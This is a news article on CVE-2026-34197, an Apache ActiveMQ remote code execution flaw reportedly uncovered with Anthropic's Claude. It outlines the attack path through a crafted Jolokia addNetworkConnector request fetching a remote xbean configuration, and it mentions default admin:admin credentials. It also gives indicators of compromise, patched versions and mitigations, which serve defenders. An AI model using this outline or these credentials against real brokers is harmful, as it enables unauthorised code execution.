How Anthropic’s Claude AI Uncovered a Hidden Apache ActiveMQ Vulnerability After 13 Years

For more than a decade, a critical security flaw lurked undetected within Apache ActiveMQ Classic, a widely used open-source message broker. The bug, recently identified as CVE-2026-34197, was finally exposed with the help of Anthropic’s AI assistant, Claude. This discovery highlights the growing role of artificial intelligence in cybersecurity and vulnerability research.

The flaw, categorized as a remote code execution (RCE) vulnerability, allows attackers to execute arbitrary operating system commands on affected systems. Horizon3.ai chief architect Naveen Sunkavally detailed the discovery in an April 7 blog post, emphasizing that organizations running ActiveMQ should prioritize patching immediately.

According to Sunkavally, “An attacker can invoke a management operation through ActiveMQ’s Jolokia API to trick the broker into fetching a remote configuration file and running arbitrary OS commands.” The vulnerability requires credentials, but default credentials (admin:admin) are common in many environments. On versions 6.0.0 through 6.1.1, no credentials are required due to another issue, CVE-2024-32114, which exposes the Jolokia API without authentication. In those versions, CVE-2026-34197 becomes an unauthenticated RCE threat.

Understanding the Apache ActiveMQ Bug and Its Impact

This Apache ActiveMQ bug has remained hidden for 13 years because it involves multiple components developed independently over time. In isolation, each feature appeared safe, but when chained together, they created a dangerous exploit path. Sunkavally noted that this is exactly where Claude excelled—efficiently stitching together the attack path end to end with a clear head free of assumptions.

“Something that would have probably taken me a week manually took Claude 10 minutes,” he said. The AI’s ability to analyze source code and identify complex interactions between components made it an invaluable tool in this discovery.

How the Vulnerability Works

The exploit leverages ActiveMQ’s Jolokia API, a management interface that allows remote access to the broker’s internal operations. By sending a crafted POST request to /api/jolokia/ containing an addNetworkConnector command, an attacker can trick the broker into fetching a malicious remote configuration file. This file then triggers the execution of arbitrary OS commands, granting the attacker control over the system.

Organizations concerned about potential compromise should check ActiveMQ broker logs for network connector activity referencing vm:// URIs with brokerConfig=xbean:http. Additional indicators of compromise include:

• POST requests to /api/jolokia/ containing addNetworkConnector in the request body
• Outbound HTTP requests from the ActiveMQ broker process to unexpected hosts
• Unexpected child processes spawned by the ActiveMQ Java process

Patches and Mitigation Steps for the ActiveMQ RCE Vulnerability

The ActiveMQ RCE vulnerability has been patched in ActiveMQ Classic versions 5.19.4 and 6.2.3. Users are strongly advised to update to these versions immediately. Additionally, ensure that no default credentials are in use. Changing the default admin:admin credentials is a critical step, as many environments still rely on these weak passwords.

For organizations unable to patch immediately, implementing network segmentation and restricting access to the Jolokia API can help reduce risk. Monitoring for the indicators of compromise listed above is also essential for early detection.

If you are using ActiveMQ, review your configuration and apply the latest updates. For more on securing message brokers, check out our guide on best practices for message broker security.

Claude AI: A New Tool for Vulnerability Hunting

Sunkavally described the discovery of CVE-2026-34197 as “80% Claude and 20% gift-wrapping by a human.” He regularly uses Claude to take a first pass at source code for vulnerability hunting, prompting it lightly and setting up a target on the network for it to validate findings.

“A lot of the time, Claude finds interesting stuff but it doesn’t quite rise to the level of a CVE I’d bother reporting. In this case, it did a great job, with nothing more than a couple of basic prompts,” he said.

This case demonstrates how AI can accelerate vulnerability research, especially for bugs that involve complex interactions across multiple components. Sunkavally urged appsec engineers and developers to adopt tools like Claude in their workflows, stating that “anyone with a security background can take advantage.”

As AI continues to evolve, its role in cybersecurity will likely expand. For more insights on AI-driven security research, explore our article on how artificial intelligence is transforming threat detection.

Final Thoughts on the 13-Year-Old Bug

The discovery of this Apache ActiveMQ bug serves as a stark reminder that vulnerabilities can remain hidden for years, especially when they involve multiple independent components. The use of AI tools like Claude can help uncover these hidden threats more efficiently than traditional manual methods.

Organizations running ActiveMQ should act quickly to patch and review their security posture. By combining AI-powered vulnerability hunting with robust security practices, the cybersecurity community can stay ahead of evolving threats. For more on securing open-source software, see our tips for open-source security.